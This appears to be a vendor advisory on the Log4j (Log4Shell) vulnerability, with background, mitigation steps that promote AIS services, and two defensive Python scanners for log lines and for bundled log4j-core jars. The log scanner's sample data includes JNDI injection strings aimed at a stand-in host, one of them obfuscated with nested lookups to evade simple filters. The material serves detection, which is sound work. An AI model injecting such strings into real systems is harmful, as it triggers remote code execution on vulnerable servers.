Log4J Cybersecurity Risks

Log4J Overview, Detection, and Mitigation


Executive Summary
Log4j is a highly consequential vulnerability. It primarily affects servers and is being actively exploited. The full set of vulnerable applications has not yet been identified, and the vulnerability is expected to be used in ransomware attacks. AIS recommends deployment of NMS, SIEM, Endpoint Management, and BDR for vulnerability detection and exploitation mitigation.
Background
CVE-2021-44228 is a critical vulnerability in Log4j, an open-source software package used by most Java-based applications to log audit, debugging, and other data chosen by the application developer. The vulnerability means that when Log4j, while logging routine data such as error messages and activity records, encounters a specially formatted web address, it does not simply write that text to a log file as usual; instead, it downloads and executes whatever file is at that web address. The combination of widespread use, ease of exploitation, and difficulty of detection makes this perhaps the most severe vulnerability seen to date. For example, because Apple iCloud logs the username of every login attempt, simply entering a specially formatted web address in the username field could cause the Apple server processing that login attempt to download and execute malicious code, creating a backdoor inside the network that can then be used for data breach and ransomware purposes.
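The mechanism above has a direct detection consequence: the dangerous input is a lookup string inside otherwise ordinary log data, so the first place a defender can see it is in the logs themselves. The following Python detector is an added example, not code from AIS or from the Log4j project. It scans constructed sample log lines (the host `example.invalid` and the usernames are made up for the example) for the `${jndi:...}` lookup, first resolving the nested `${lower:...}`, `${upper:...}` and `${...:-default}` lookups that Log4j 2.x evaluates innermost-first, because a plain substring rule for "jndi" misses lines where that token has been split across such lookups.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Innermost ${lower:x} / ${upper:x} lookups (no further braces inside).
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
# Innermost ${name:-default} lookups; an unset name resolves to the default text.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# The lookup that triggers the remote load described in the text.
_JNDI_ANY = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
_JNDI_URL = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*://([^/}\s:]+)", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    raw: str
    normalized: str
    scheme: Optional[str]   # e.g. "ldap" or "rmi", when a URL could be parsed
    host: Optional[str]     # host the lookup would have contacted


def normalize(text: str, max_rounds: int = 10) -> str:
    """Resolve nested lower/upper/default lookups the way Log4j 2.x would,
    innermost first, so a split-up or re-cased "jndi" token becomes literal."""
    for _ in range(max_rounds):
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        new = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            new,
        )
        if new == text:
            return text
        text = new
    return text


def scan_lines(lines) -> List[Finding]:
    """Return one Finding per log line whose normalized content contains a JNDI lookup."""
    findings: List[Finding] = []
    for line_no, line in enumerate(lines, start=1):
        norm = normalize(line)
        if not _JNDI_ANY.search(norm):
            continue
        m = _JNDI_URL.search(norm)
        findings.append(Finding(
            line_no=line_no,
            raw=line.rstrip("\n"),
            normalized=norm.rstrip("\n"),
            scheme=m.group(1).lower() if m else None,
            host=m.group(2) if m else None,
        ))
    return findings


# Constructed sample log lines (not from any real system). Line 3 carries the
# nested-lookup form that a plain substring rule for "jndi" would miss.
SAMPLE_LOG = [
    "2021-12-10T12:00:01Z INFO login attempt user=alice from=10.0.0.5",
    "2021-12-10T12:00:02Z INFO login attempt user=${jndi:ldap://example.invalid:1389/x} from=10.0.0.6",
    "2021-12-10T12:00:03Z INFO user-agent=${${lower:j}${upper:n}di:${env:NOPE:-l}dap://example.invalid/a}",
    "2021-12-10T12:00:04Z DEBUG rendered template ${date:yyyy-MM-dd} for user=bob",
]

if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG):
        print(f"line {f.line_no}: jndi lookup -> {f.scheme}://{f.host}")
        print(f"  raw: {f.raw}")
```

Running the block reports lines 2 and 3 and leaves the benign `${date:...}` lookup on line 4 alone. In a SIEM rule the same normalization should also be applied after URL-decoding and to every logged field (headers, usernames, form values), since any of them may end up in a Log4j log statement.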
Detection and Mitigation
  • Continuous scanning
    • Identify known and suspected vulnerable assets within the IT environment
    • One-time scans are no longer sufficient, as additional vulnerable applications continue to be identified
    • Related Solution - AIS NMS integrates OpenVAS for automated Network Vulnerability Testing
  • Patch Management
    • Update Log4j within 3rd party products to the latest version
    • Ensure critical software patches in Windows and other software are applied to reduce the risk of lateral movement from a compromised system
    • Related Solution - AIS Endpoint Management with 3rd party software patching capability
  • Threat Hunting
    • Increase the odds of detecting compromised systems before data exfiltration or ransomware deployment with automated review of anomalous activity
    • Related Solution - AIS Managed SIEM
  • Proactive ransomware protection
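The continuous-scanning and patch-management items above both depend on knowing where Log4j actually lives, and it is usually bundled inside third-party jar, war and ear files rather than installed on its own. The following Python scanner is an added example, not AIS or Apache code. It walks a directory tree, opens every archive (recursing into archives nested inside archives), reads the version from the `pom.properties` that Maven-built log4j-core jars carry, and checks whether `JndiLookup.class` is present. The minimum fixed version `(2, 17, 1)` is an assumption for this example reflecting the 2.x line at the page's date; the sample archives it builds in a temporary directory are constructed fixtures, not real Log4j builds.

```python
import io
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Assumed minimum fixed release for the Log4j 2.x line as of this page's date
# (an assumption for this example; raise it as further releases ship).
MIN_FIXED_VERSION: Tuple[int, ...] = (2, 17, 1)

# Files that identify a log4j-core build inside an archive.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


@dataclass
class Finding:
    path: str                # on-disk path; nested archives are joined with "!"
    version: Optional[str]
    jndi_lookup_present: bool
    status: str              # vulnerable | mitigated-class-removed | patched | unknown-version


def version_tuple(version: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); a missing patch number counts as 0."""
    parts = [int(p) for p in re.findall(r"\d+", version)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def classify(version: Optional[str], jndi_lookup_present: bool) -> str:
    if version is None:
        return "unknown-version"          # needs manual review
    if version_tuple(version) >= MIN_FIXED_VERSION:
        return "patched"
    # Deleting JndiLookup.class from an old build blocks the lookup; still report
    # the asset so it stays tracked until it is actually upgraded.
    return "vulnerable" if jndi_lookup_present else "mitigated-class-removed"


def inspect_archive(zf: zipfile.ZipFile, label: str, out: List[Finding]) -> None:
    names = set(zf.namelist())
    if POM_PROPERTIES in names:
        props = zf.read(POM_PROPERTIES).decode("utf-8", "replace")
        m = re.search(r"^version=(\S+)", props, re.MULTILINE)
        version = m.group(1) if m else None
        present = JNDI_CLASS in names
        out.append(Finding(label, version, present, classify(version, present)))
    # Fat jars, wars and ears bundle their dependencies: recurse into nested archives.
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    inspect_archive(inner, f"{label}!{name}", out)
            except zipfile.BadZipFile:
                continue


def scan_tree(root: str) -> List[Finding]:
    """Walk a directory tree and report every embedded log4j-core build found."""
    findings: List[Finding] = []
    for dirpath, _, filenames in os.walk(root):
        for fn in sorted(filenames):
            if not fn.lower().endswith(ARCHIVE_SUFFIXES):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with zipfile.ZipFile(path) as zf:
                    inspect_archive(zf, path, findings)
            except zipfile.BadZipFile:
                continue
    return findings


def build_sample_jar(target, version: str, include_jndi_class: bool = True) -> None:
    """Write a constructed stand-in for a log4j-core jar (fixture, not a real build)."""
    with zipfile.ZipFile(target, "w") as zf:
        zf.writestr(POM_PROPERTIES,
                    f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if include_jndi_class:
            zf.writestr(JNDI_CLASS, b"placeholder, not real bytecode")


def run_demo() -> List[Finding]:
    """Create constructed archives in a temporary directory and scan them."""
    root = tempfile.mkdtemp(prefix="log4j-scan-demo-")
    build_sample_jar(os.path.join(root, "log4j-core-2.14.1.jar"), "2.14.1")
    build_sample_jar(os.path.join(root, "log4j-core-2.17.1.jar"), "2.17.1")
    build_sample_jar(os.path.join(root, "log4j-core-stripped.jar"), "2.14.1", include_jndi_class=False)
    inner = io.BytesIO()   # an old build hidden inside a web application archive
    build_sample_jar(inner, "2.14.1")
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", inner.getvalue())
    return scan_tree(root)


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f.status:24} version={f.version} JndiLookup={f.jndi_lookup_present} {f.path}")
```

Point `scan_tree` at application directories, container image layers or backup mounts and feed the findings into the asset list the continuous-scanning item calls for; the `unknown-version` status exists precisely because repackaged or shaded builds may lack `pom.properties` and need a manual look rather than a silent pass.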

AIS treats all security issues as critical and recommends deployment of NMS, SIEM, Endpoint Management, and BDR for vulnerability detection and exploitation mitigation. Please reach out to your primary AIS contact person with any questions regarding this vulnerability or solutions for detection and mitigation.
Last modified January 6, 2022